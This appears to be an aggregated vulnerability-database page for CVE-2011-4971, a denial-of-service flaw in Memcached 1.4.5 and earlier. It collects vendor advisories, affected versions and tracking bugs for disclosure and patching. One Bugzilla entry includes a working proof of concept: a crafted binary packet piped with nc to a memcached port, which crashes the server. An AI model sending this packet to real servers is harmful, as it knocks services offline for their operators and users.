CVE-2011-4971
Published 2013-12-12
Priority P3 · 34 · medium · 5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 22.32% (97.4th percentile)
Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_append_prepend functions in Memcached 1.4.5 and earlier allow remote attackers to cause a denial of service (crash) via a large body length value in a packet.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | memcached | < memcached 1.4.13-0.3 (bookworm) | memcached 1.4.13-0.3 (bookworm) |
| memcached | memcached | <= 1.4.5 | — |
| memcached | memcached | >= 0 < 1.4.13-0.3 | 1.4.13-0.3 |
CVSS provenance
nvd · v2.0 · 5.0 · MEDIUM · AV:N/AC:L/Au:N/C:N/I:N/A:P
osv · 5.0 · MEDIUM
vendor_debian · 5.0 · MEDIUM
vendor_redhat · 5.0 · MEDIUM
vendor_ubuntu · 5.0 · MEDIUM
GHSA
GHSA-pj3v-4mjw-vvpv: Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_a
ghsa_unreviewed·2022-05-14
OSV
CVE-2011-4971: Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process_bin_complete_sasl_auth, (3) process_bin_update, and (4) process_bin_a
osv·2013-12-12·CVSS 5.0
Ubuntu
Memcached vulnerabilities
vendor_ubuntu·2014-01-13·CVSS 5.0
Title: Memcached vulnerabilities
Summary: Several security issues were fixed in Memcached.
Stefan Bucur discovered that Memcached incorrectly handled certain large
body lengths. A remote attacker could use this issue to cause Memcached to
crash, resulting in a denial of service. (CVE-2011-4971)
Jeremy Sowden discovered that Memcached incorrectly handled logging certain
details when the -vv option was used. An attacker could use this issue to
cause Memcached to crash, resulting in a denial of service. (CVE-2013-0179)
It was discovered that Memcached incorrectly handled SASL authentication.
A remote attacker could use this issue to bypass SASL authentication
completely. This issue only affected Ubuntu 12.10, Ubuntu 13.04 and Ubuntu
13.10. (CVE-2013-7239)
Instructions: In general, a stan
Red Hat
memcached: specially crafted packet segmentation fault
vendor_redhat·2011-05-15·CVSS 5.0
Package: memcached (CloudForms Management Engine 5) - Will not fix
Package: memcached (Red Hat Enterprise Linux 6) - Will not fix
Package: memcached (Red Hat Enterprise Linux 7) - Not affected
Debian
CVE-2011-4971: memcached - Multiple integer signedness errors in the (1) process_bin_sasl_auth, (2) process...
vendor_debian·2011·CVSS 5.0
Scope: local
bookworm: resolved (fixed in 1.4.13-0.3)
bullseye: resolved (fixed in 1.4.13-0.3)
forky: resolved (fixed in 1.4.13-0.3)
sid: resolved (fixed in 1.4.13-0.3)
trixie: resolved (fixed in 1.4.13-0.3)
No detection rules found.
arXiv
Unlimited Lives: Secure In-Process Rollback with Isolated Domains
arxiv_fulltext·2023-04-21
Merve Gülmez (Ericsson Security Research, Kista, Sweden; imec-DistriNet, KU Leuven, Leuven, Belgium; merve.gulmez@kuleuven.be)
Thomas Nyman (Ericsson Product Security, Jorvas, Finland; thomas.nyman@ericsson.com)
Christoph Baumann (Ericsson Security Research, Kista, Sweden; christoph.baumann@ericsson.com)
Jan Tobias Mühlberg (imec-DistriNet, KU Leuven, Leuven, Belgium; Université Libre de Bruxelles, Brussels, Belgium)
Unlimited Lives: Secure In-Process Rollback with Isolated Domains
Merve Turhan (Ericsson Security Research; imec-DistriNet, KU Leuven)
Thomas Nyman (Ericsson Product Security)
Christoph Baumann (Ericsson Security Research)
Jan Tobias Mühlberg (imec-DistriNet, KU Leuven)
## Abstra
arXiv
Intel MPX Explained: An Empirical Study of Intel MPX and Software-based Bounds Checking Approaches
arxiv_fulltext·2017-06-16
https://Intel-MPX.github.io
Oleksii Oleksenko, Dmitrii Kuvaiskii, Pramod Bhatotia, Pascal Felber, and Christof Fetzer
TU Dresden; The University of Edinburgh; University of Neuchâtel
### Abstract
Memory-safety violations are a prevalent cause of both reliability and security vulnerabilities in systems software written in unsafe languages like C/C++.
Unfortunately, all the existing software-based solutions to this problem exhibit high performance overheads preventing them from wide adoption in production runs.
To address this issue, Intel recently released a new ISA extension: Memory Protection Extensions (MPX), a hardware-assisted full-stack solution to protect against
Bugzilla
CVE-2011-4971 memcached: specially crafted packet segmentation fault [epel-6]
bugzilla·2013-04-30·CVSS 5.0
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please use the bodhi submission link
noted in the next comment(s). This will include the bug IDs of this
tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
Bodhi notes field when available.
epel-6 tracking bug fo
Bugzilla
CVE-2011-4971 memcached: specially crafted packet segmentation fault [epel-5]
bugzilla·2013-04-30·CVSS 5.0
epel-5 tracking bug fo
Bugzilla
CVE-2011-4971 memcached: specially crafted packet segmentation fault [fedora-all]
bugzilla·2013-04-30·CVSS 5.0
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please use the bodhi submission link
noted in the next comment(s). This will include the bug IDs of this
tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
Bodhi notes field when available.
Please note: this issue
Bugzilla
CVE-2011-4971 memcached: specially crafted packet segmentation fault
bugzilla·2013-04-30·CVSS 5.0
This was originally reported by Stefan Bucur:
1. Start memcached in TCP mode. For example:
$ ./memcached -v -p 11211 -U 0
2. Send the specially crafted packet to it:
$ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211
====
There is a patch mentioned in the original issue report, but the code has
changed significantly since then.
External References:
https://code.google.com/p/memcached/issues/detail?id=192
http://insecurety.net/?p=872
Discussion:
Created memcached tracking bugs for this i
http://insecurety.net/?p=872
http://secunia.com/advisories/56183
http://www.debian.org/security/2014/dsa-2832
http://www.mandriva.com/security/advisories?name=MDVSA-2013:280
http://www.securityfocus.com/bid/59567
http://www.ubuntu.com/usn/USN-2080-1
https://code.google.com/p/memcached/issues/detail?id=192
https://puppet.com/security/cve/cve-2011-4971